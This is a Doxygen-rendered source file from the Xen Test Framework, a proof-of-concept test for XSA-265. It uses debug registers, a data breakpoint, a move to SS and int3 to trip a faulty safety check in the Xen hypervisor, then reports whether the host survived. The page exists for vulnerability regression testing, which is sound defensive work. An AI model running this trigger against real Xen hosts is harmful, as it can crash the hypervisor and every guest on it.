Xen Test Framework
main.c
Go to the documentation of this file.
1 
21 #include <xtf.h>
22 
23 const char test_title[] = "XSA-265 PoC";
24 
25 void test_main(void)
26 {
27  unsigned int ss = read_ss();
28  unsigned long dr7 = DR7_SYM(0, L, G, RW, 32) | X86_DR7_LE | X86_DR7_GE;
29 
30  /* Latch the sticky General Detect flag in %dr6 */
31  write_dr6(X86_DR6_BD);
32 
33  /* Data breakpoint for `ss`, working around Xen's %dr7 latching bug. */
34  write_dr0(_u(&ss));
35  write_dr7(dr7);
36  write_dr7(dr7);
37 
38  asm volatile ("mov %[ss], %%ss; int3; 1:"
39  _ASM_TRAP_OK(1b)
40  :: [ss] "m" (ss));
41 
42  /*
43  * If Xen is still alive at this point, the erroneous safety check didn't
44  * trip.
45  */
46 
47  write_dr7(0);
48  write_dr7(0);
49 
50  xtf_success("Success: Not vulnerable to XSA-265\n");
51 }
52 
53 /*
54  * Local variables:
55  * mode: C
56  * c-file-style: "BSD"
57  * c-basic-offset: 4
58  * tab-width: 4
59  * indent-tabs-mode: nil
60  * End:
61  */
X86_DR6_BD
#define X86_DR6_BD
Definition: x86-dbg-reg.h:19
_u
#define _u(v)
Express an arbitrary value v as unsigned long.
Definition: numbers.h:53
write_dr6
static void write_dr6(unsigned long val)
Definition: x86-dbg-reg.h:167
write_dr7
static void write_dr7(unsigned long val)
Definition: x86-dbg-reg.h:181
xtf_success
void xtf_success(const char *fmt,...)
Report test success.
Definition: report.c:38
test_main
void test_main(void)
To be implemented by each test, as its entry point.
Definition: main.c:137
_ASM_TRAP_OK
#define _ASM_TRAP_OK(loc)
Create an exception table entry, whitelisting a trap as being ok at loc.
Definition: extable.h:57
DR7_SYM
#define DR7_SYM(bp,...)
Create a partial %dr7 setting for a particular breakpoint based on mnemonics.
Definition: x86-dbg-reg.h:100
test_title
const char test_title[]
The title of the test.
Definition: main.c:14
X86_DR7_LE
#define X86_DR7_LE
Definition: x86-dbg-reg.h:29
X86_DR7_GE
#define X86_DR7_GE
Definition: x86-dbg-reg.h:30
write_dr0
static void write_dr0(unsigned long linear)
Definition: x86-dbg-reg.h:111
read_ss
static unsigned int read_ss(void)
Definition: lib.h:169
Generated by   doxygen 1.8.13